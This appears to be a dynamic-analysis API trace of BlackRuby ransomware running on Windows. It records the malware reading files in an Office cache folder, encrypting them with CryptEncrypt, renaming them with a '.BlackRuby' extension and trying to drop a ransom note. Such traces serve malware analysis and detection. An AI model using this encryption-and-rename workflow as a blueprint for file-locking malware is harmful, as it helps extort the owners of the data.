[0046.356] GetLastError () returned 0x0 [0046.356] CloseHandle (hObject=0x184) returned 1 [0046.356] GetLastError () returned 0x0 [0046.356] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.356] GetLastError () returned 0x0 [0046.356] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0046.356] GetLastError () returned 0x0 [0046.356] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0046.356] GetLastError () returned 0x0 [0046.356] SetErrorMode (uMode=0x1) returned 0x0 [0046.356] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\onenotemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x1bbc600 | out: lpFileInformation=0x1bbc600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x384c5590, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x646)) returned 1 [0046.356] GetLastError () returned 0x0 [0046.356] SetErrorMode (uMode=0x0) returned 0x1 [0046.357] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0046.357] GetLastError () returned 0x0 [0046.357] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0046.357] GetLastError () returned 0x0 [0046.357] SetErrorMode (uMode=0x1) returned 0x0 [0046.357] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.357] GetLastError () returned 0x0 [0046.357] GetFileType (hFile=0x184) returned 0x1 [0046.357] SetErrorMode (uMode=0x0) returned 0x1 [0046.357] GetFileType (hFile=0x184) returned 0x1 [0046.357] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x646 [0046.357] GetLastError () returned 0x0 [0046.357] ReadFile (in: hFile=0x184, lpBuffer=0x1bbeaa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1bbeaa8*, lpNumberOfBytesRead=0x18ed84*=0x646, lpOverlapped=0x0) returned 1 [0046.359] GetLastError () returned 0x0 [0046.359] CloseHandle (hObject=0x184) returned 1 [0046.359] GetLastError () returned 0x0 [0046.359] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0046.359] GetLastError () returned 0x0 [0046.359] SetErrorMode (uMode=0x1) returned 0x0 [0046.359] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\onenotemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x384c5590, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x646)) returned 1 [0046.359] GetLastError () returned 0x0 [0046.359] SetErrorMode (uMode=0x0) returned 0x1 [0046.359] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0046.359] GetLastError () returned 0x0 [0046.392] CryptImportKey (in: hProv=0x37c680, pbData=0x1c1a4dc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360d20) returned 1 [0046.392] GetLastError () returned 0x0 [0046.392] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.392] GetLastError () returned 0x0 [0046.398] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.398] GetLastError () returned 0x0 [0046.398] CryptDuplicateKey (in: hKey=0x360d20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360c20) returned 1 [0046.398] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.398] GetLastError () returned 0x0 [0046.398] CryptSetKeyParam (hKey=0x360c20, dwParam=0x4, pbData=0x1c47528*=0x1, dwFlags=0x0) returned 1 [0046.398] GetLastError () returned 0x0 [0046.398] CryptSetKeyParam (hKey=0x360c20, dwParam=0x1, pbData=0x1c474f4, dwFlags=0x0) returned 1 [0046.398] GetLastError () returned 0x0 [0046.398] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c47570*, pdwDataLen=0x18ed74*=0x740, dwBufLen=0x740 | out: pbData=0x1c47570*, pdwDataLen=0x18ed74*=0x740) returned 1 [0046.398] GetLastError () returned 0x0 [0046.398] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c4841c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c4841c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0046.398] GetLastError () returned 0x0 [0046.398] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c4844c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c4844c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0046.398] GetLastError () returned 0x0 [0046.398] CryptDestroyKey (hKey=0x360d20) returned 1 [0046.398] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.398] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.398] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0046.398] GetLastError () returned 0x0 [0046.398] SetErrorMode (uMode=0x1) returned 0x0 [0046.398] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.399] GetLastError () returned 0xb7 [0046.399] GetFileType (hFile=0x184) returned 0x1 [0046.399] SetErrorMode (uMode=0x0) returned 0x1 [0046.399] GetFileType (hFile=0x184) returned 0x1 [0046.401] CloseHandle (hObject=0x184) returned 1 [0046.401] GetLastError () returned 0xb7 [0046.401] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0046.401] GetLastError () returned 0xb7 [0046.401] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Encrypted_6l07DDcSiAN7RssiY9ptpD2Z6zjMmzopASle8hC.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Encrypted_6l07DDcSiAN7RssiY9ptpD2Z6zjMmzopASle8hC.BlackRuby", lpFilePart=0x0) returned 0x7a [0046.401] GetLastError () returned 0xb7 [0046.401] SetErrorMode (uMode=0x1) returned 0x0 [0046.401] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\onenotemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x23dccc00, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x750)) returned 1 [0046.401] GetLastError () returned 0xb7 [0046.401] SetErrorMode (uMode=0x0) returned 0x1 [0046.401] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Encrypted_6l07DDcSiAN7RssiY9ptpD2Z6zjMmzopASle8hC.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\encrypted_6l07ddcsian7rssiy9ptpd2z6zjmmzopasle8hc.blackruby")) returned 1 [0046.401] GetLastError () returned 0xb7 [0046.402] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.402] GetLastError () returned 0xb7 [0046.402] SetErrorMode (uMode=0x1) returned 0x0 [0046.402] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.402] GetLastError () returned 0x5 [0046.403] SetErrorMode (uMode=0x0) returned 0x1 [0046.403] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OnoteLR.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OnoteLR.cab", lpFilePart=0x0) returned 0x4a [0046.403] GetLastError () returned 0x5 [0046.403] SetErrorMode (uMode=0x1) returned 0x0 [0046.403] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\onotelr.cab"), fInfoLevelId=0x0, lpFileInformation=0x1c67f5c | out: lpFileInformation=0x1c67f5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x10b5fd00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x10b5fd00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x38538180, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x10a4bce)) returned 1 [0046.403] GetLastError () returned 0x5 [0046.403] SetErrorMode (uMode=0x0) returned 0x1 [0046.404] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.404] GetLastError () returned 0x5 [0046.404] SetErrorMode (uMode=0x1) returned 0x0 [0046.404] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.404] GetLastError () returned 0x5 [0046.405] SetErrorMode (uMode=0x0) returned 0x1 [0046.405] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.405] GetLastError () returned 0x5 [0046.405] SetErrorMode (uMode=0x1) returned 0x0 [0046.405] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1c86040 | out: lpFileInformation=0x1c86040*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x391b8c70, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x7c4)) returned 1 [0046.405] GetLastError () returned 0x5 [0046.405] SetErrorMode (uMode=0x0) returned 0x1 [0046.405] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.405] GetLastError () returned 0x5 [0046.405] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.405] GetLastError () returned 0x5 [0046.405] SetErrorMode (uMode=0x1) returned 0x0 [0046.405] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.405] GetLastError () returned 0x0 [0046.405] GetFileType (hFile=0x184) returned 0x1 [0046.405] SetErrorMode (uMode=0x0) returned 0x1 [0046.405] GetFileType (hFile=0x184) returned 0x1 [0046.405] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x7c4 [0046.406] GetLastError () returned 0x0 [0046.406] ReadFile (in: hFile=0x184, lpBuffer=0x1c887f4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c887f4*, lpNumberOfBytesRead=0x18ed84*=0x7c4, lpOverlapped=0x0) returned 1 [0046.408] GetLastError () returned 0x0 [0046.408] CloseHandle (hObject=0x184) returned 1 [0046.408] GetLastError () returned 0x0 [0046.408] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.408] GetLastError () returned 0x0 [0046.408] SetErrorMode (uMode=0x1) returned 0x0 [0046.408] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x391b8c70, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x7c4)) returned 1 [0046.408] GetLastError () returned 0x0 [0046.408] SetErrorMode (uMode=0x0) returned 0x1 [0046.408] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c708) returned 1 [0046.408] GetLastError () returned 0x0 [0046.442] CryptImportKey (in: hProv=0x37c708, pbData=0x1ce4390, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ee0) returned 1 [0046.442] GetLastError () returned 0x0 [0046.442] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.442] GetLastError () returned 0x0 [0046.447] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.447] GetLastError () returned 0x0 [0046.447] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f20) returned 1 [0046.447] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.447] GetLastError () returned 0x0 [0046.447] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1d113dc*=0x1, dwFlags=0x0) returned 1 [0046.447] GetLastError () returned 0x0 [0046.447] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1d113a8, dwFlags=0x0) returned 1 [0046.447] GetLastError () returned 0x0 [0046.447] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d11424*, pdwDataLen=0x18ed74*=0x8c0, dwBufLen=0x8c0 | out: pbData=0x1d11424*, pdwDataLen=0x18ed74*=0x8c0) returned 1 [0046.447] GetLastError () returned 0x0 [0046.447] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d125d0*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1d125d0*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0046.447] GetLastError () returned 0x0 [0046.447] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d12600*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1d12600*, pdwDataLen=0x18ed94*=0x10) returned 1 [0046.447] GetLastError () returned 0x0 [0046.447] CryptDestroyKey (hKey=0x360ee0) returned 1 [0046.447] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.447] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.447] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.447] GetLastError () returned 0x0 [0046.447] SetErrorMode (uMode=0x1) returned 0x0 [0046.447] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.448] GetLastError () returned 0xb7 [0046.448] GetFileType (hFile=0x184) returned 0x1 [0046.448] SetErrorMode (uMode=0x0) returned 0x1 [0046.448] GetFileType (hFile=0x184) returned 0x1 [0046.450] CloseHandle (hObject=0x184) returned 1 [0046.450] GetLastError () returned 0xb7 [0046.450] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.450] GetLastError () returned 0xb7 [0046.450] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Encrypted_scBJHHCG3n5PtmEThP39LARBKPqKdKCjLroa0lsybCT0Ot.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Encrypted_scBJHHCG3n5PtmEThP39LARBKPqKdKCjLroa0lsybCT0Ot.BlackRuby", lpFilePart=0x0) returned 0x81 [0046.450] GetLastError () returned 0xb7 [0046.450] SetErrorMode (uMode=0x1) returned 0x0 [0046.450] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x23e3f020, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x8d0)) returned 1 [0046.450] GetLastError () returned 0xb7 [0046.450] SetErrorMode (uMode=0x0) returned 0x1 [0046.450] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\Encrypted_scBJHHCG3n5PtmEThP39LARBKPqKdKCjLroa0lsybCT0Ot.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\encrypted_scbjhhcg3n5ptmethp39larbkpqkdkcjlroa0lsybct0ot.blackruby")) returned 1 [0046.450] GetLastError () returned 0xb7 [0046.451] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.451] GetLastError () returned 0xb7 [0046.451] SetErrorMode (uMode=0x1) returned 0x0 [0046.451] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.451] GetLastError () returned 0x5 [0046.452] SetErrorMode (uMode=0x0) returned 0x1 [0046.452] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.452] GetLastError () returned 0x5 [0046.452] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.452] GetLastError () returned 0x5 [0046.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.452] GetLastError () returned 0x5 [0046.452] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.452] GetLastError () returned 0x5 [0046.452] SetErrorMode (uMode=0x1) returned 0x0 [0046.452] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0046.454] GetLastError () returned 0x5 [0046.454] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.454] GetLastError () returned 0x5 